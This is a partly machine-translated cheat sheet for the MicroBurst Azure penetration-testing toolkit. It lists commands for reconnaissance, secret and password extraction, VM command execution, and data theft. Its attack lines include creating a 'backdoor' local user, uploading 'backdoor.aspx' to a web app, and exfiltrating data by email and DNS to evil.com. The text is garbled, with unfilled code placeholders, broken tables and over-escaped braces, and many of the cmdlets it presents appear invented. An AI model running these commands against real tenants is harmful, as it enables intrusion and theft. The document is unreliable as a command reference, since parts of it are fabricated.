Microburst
MicroBurst Azure Security Testing Toolkit Cheat Sheet
__HTML_TAG_52_ Todos los comandos
Overview¶
MicroBurst es una colección de scripts PowerShell desarrollados por NetSPI para evaluar la seguridad de Microsoft Azure. Incluye herramientas para el descubrimiento de servicios de Azure, escalada de privilegios, movimiento lateral y exfiltración de datos, lo que lo convierte en un completo kit de herramientas para las pruebas de penetración de Azure.
▪ restablecimiento Advertencia: Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y evaluaciones de seguridad. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.
Instalación¶
Power Instalación de galería de Shell¶
# Install from PowerShell Gallery
Install-Module -Name MicroBurst
# Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser
# Update existing installation
Update-Module -Name MicroBurst
# Import module
Import-Module MicroBurst
Instalación manual¶
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip"
Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"
# Import module
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1
# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD
Git install¶
# Clone repository
git clone https://github.com/NetSPI/MicroBurst.git
cd MicroBurst
# Import in PowerShell
Import-Module .\MicroBurst.psd1
Uso básico¶
Module Setup¶
# Import MicroBurst
Import-Module MicroBurst
# Get available commands
Get-Command -Module MicroBurst
# Get help for specific function
Get-Help Invoke-EnumerateAzureBlobs -Full
# Check module version
Get-Module MicroBurst
Authentication¶
# Interactive authentication
Connect-AzAccount
# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"
# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"
Command Reference¶
Reconnaissance Functions¶
| Function | Description |
|---|---|
| INLINE_CODE_38 | Enumerate Azure storage blobs |
| INLINE_CODE_39 | Enumerate Azure subdomains |
| INLINE_CODE_40 | Extract passwords from Azure resources |
| INLINE_CODE_41 | Get domain information |
| INLINE_CODE_42 | Execute commands on multiple VMs |
Storage Account Functions_¶
| Function | Description |
|---|---|
| INLINE_CODE_43 | Find accessible storage blobs |
| INLINE_CODE_44 | Download files from storage |
| INLINE_CODE_45 | Enumerate storage accounts |
| INLINE_CODE_46 | Extract storage account keys |
| _ | |
| ## Virtual Machine Functions | |
| Function | Description |
| ---------- | ------------- |
| INLINE_CODE_47 | Bulk command execution |
| INLINE_CODE_48 | Access VM disk information |
| INLINE_CODE_49 | Enumerate VM user data |
| INLINE_CODE_50 | Get VM extension settings |
| _ | |
| ## Azure Storage Enumeration |
Blob Storage Discovery¶
# Basic blob enumeration
Invoke-EnumerateAzureBlobs -Base "company"
# Enumerate with custom wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"
# Enumerate specific containers
Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")
# Enumerate with threading
Invoke-EnumerateAzureBlobs -Base "company" -Threads 10
Storage Account Enumeration¶
# Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"
# Get storage account keys
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"
# Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"
# Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\"
File Share Enumeration¶
# Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"
# Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"
# Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\"
Subdomain and Service Discovery¶
Azure Subdomain Enumeration¶
# Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"
# Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")
# Enumerate with permutations
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")
# Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt"
Service Discovery¶
# Discover Azure services
Get-AzureServices -Domain "company.com"
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id"
DNS Enumeration¶
# Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"
# Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"
# Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt"
Virtual Machine Exploitation¶
VM Command Execution¶
# Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"
# Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3")
Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"
# Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1"
VM Disk Access¶
# Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"
# Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"
# Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"
# Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\"
VM Extension Exploitation¶
# Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"
# Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"
# Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add"
Credential and Secret Extraction¶
Extracción de contraseña
# Extract passwords from Azure resources
Get-AzurePasswords -SubscriptionId "subscription-id"
# Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")
# Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"
# Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id"
Certificado de Extracción¶
# Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"
# Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"
# Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\"
Extracción de datos de configuración
# Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"
# Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"
# Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name"
Database Exploitation¶
SQL Database Enumeration¶
# Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"
# Check SQL firewall rules
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"
# Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name"
SQL Database Access¶
# Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred
# Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"
# Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"
# Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\"
CosmosDB Exploitation¶
# Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"
# Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"
# Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container"
Explotación de aplicaciones web¶
Web App Enumeration¶
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"
# Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"
# Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name"
Web App Exploitation¶
# Access web app files via Kudu
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"
# Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"
# Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"
# Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name"
Función App Exploitation¶
# Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"
# Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"
# Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload
# Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name"
Privilege Escalation¶
Role Assignment Enumeration¶
# Get current user roles
Get-AzureCurrentUserRoles
# Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"
# Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"
# Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id"
Service Principal Abuse¶
# Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"
# Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"
# Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser"
Explotación de identidad administrada¶
# Check for managed identity
Test-AzureManagedIdentity
# Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"
# Use managed identity for privilege escalation
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription"
Lateral Movement¶
Cross-Subscription Acceso¶
# Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions
# Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"
# Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id"
Cross-Tenant Access¶
# Enumerate accessible tenants
Get-AzureAccessibleTenants
# Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"
# Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id"
Resource Group Pivoting¶
# Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"
# Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
# Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg"
Exfiltración de datos¶
Extracción de datos a granel
# Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
# Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
# Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress
Stealth Exfiltration¶
# Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
# Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
# Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com"
Automatización y scripting¶
Automated Assessment Script¶
# Comprehensive Azure assessment
param(
[string]$SubscriptionId,
[string]$OutputPath = "C:\AzureAssessment"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force
# Authenticate
Connect-AzAccount
# Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId
# Enumerate subdomains
Write-Host "Enumerating subdomains..."
$subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name
$subdomains|Out-File "$OutputPath\subdomains.txt"
# Enumerate storage blobs
Write-Host "Enumerating storage blobs..."
$blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name
$blobs|Out-File "$OutputPath\blobs.txt"
# Extract passwords
Write-Host "Extracting passwords..."
$passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId
$passwords|Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation
# Get VM information
Write-Host "Gathering VM information..."
$vms = Get-AzVM
$vms|Export-Csv "$OutputPath\vms.csv" -NoTypeInformation
# Generate summary report
$summary = @\\\\{
AssessmentDate = Get-Date
SubscriptionId = $SubscriptionId
SubdomainsFound = $subdomains.Count
BlobsFound = $blobs.Count
PasswordsFound = $passwords.Count
VMsFound = $vms.Count
\\\\}
$summary|ConvertTo-Json|Out-File "$OutputPath\summary.json"
Write-Host "Assessment completed. Results saved to $OutputPath"
Continuous Monitoring¶
# Continuous Azure monitoring
param(
[int]$IntervalMinutes = 60,
[string]$LogPath = "C:\AzureMonitoring\monitor.log"
)
while ($true) \\\\{
$timestamp = Get-Date
Write-Output "[$timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append
try \\\\{
# Check for new storage accounts
$newStorage = Get-AzStorageAccount|Where-Object \\\\{$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newStorage) \\\\{
Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new VMs
$newVMs = Get-AzVM|Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newVMs) \\\\{
Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new role assignments
$newRoles = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newRoles) \\\\{
Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
\\\\}
catch \\\\{
Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}
Start-Sleep -Seconds ($IntervalMinutes * 60)
\\\\}
Troubleshooting¶
Problemas de autenticación¶
# Clear cached credentials
Clear-AzContext -Force
# Test authentication
$context = Get-AzContext
if (-not $context) \\\\{
Write-Error "Not authenticated to Azure"
Connect-AzAccount
\\\\}
# Verify subscription access
Get-AzSubscription
Module Issues¶
# Check MicroBurst installation
Get-Module MicroBurst -ListAvailable
# Update MicroBurst
Update-Module MicroBurst -Force
# Check dependencies
Get-Module Az -ListAvailable
Permission Issues¶
# Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
$roleAssignments|Select-Object RoleDefinitionName, Scope
# Test specific permissions
try \\\\{
Get-AzStorageAccount -ErrorAction Stop
Write-Output "Storage account read permission: OK"
\\\\}
catch \\\\{
Write-Output "Storage account read permission: DENIED"
\\\\}
Integración con otras herramientas¶
BloodHound Integration¶
# Export data for BloodHound
$azureData = @\\\\{
users = Get-AzADUser
groups = Get-AzADGroup
servicePrincipals = Get-AzADServicePrincipal
roleAssignments = Get-AzRoleAssignment
\\\\}
# Convert to BloodHound format
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData
$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "azure_bloodhound.json"
Metasploit Integration¶
# Metasploit module for MicroBurst
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = \\\\{\\\\})
super(update_info(info,
'Name' => 'Azure MicroBurst Integration',
'Description' => 'Execute MicroBurst functions via Metasploit',
'Author' => ['NetSPI'],
'License' => MSF_LICENSE
))
register_options([
OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
])
end
def run
subscription_id = datastore['SUBSCRIPTION_ID']
function = datastore['FUNCTION']
# Execute MicroBurst function
powershell_cmd = "Import-Module MicroBurst; #\\\\{function\\\\} -SubscriptionId #\\\\{subscription_id\\\\}"
print_status("Executing: #\\\\{powershell_cmd\\\\}")
# Execute PowerShell command
end
end
Resources¶
- [MicroBurst GitHub Repository](URL_57__ [NetSPI Blog](URL_58__
- [Documentación de Seguridad Azul](URL_59__
- Azure Penetration Testing_
- [Azure Red Team Tactics](URL_61__
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de MicroBurst. Siempre asegúrese de tener una autorización adecuada antes de realizar evaluaciones de seguridad de Azure. *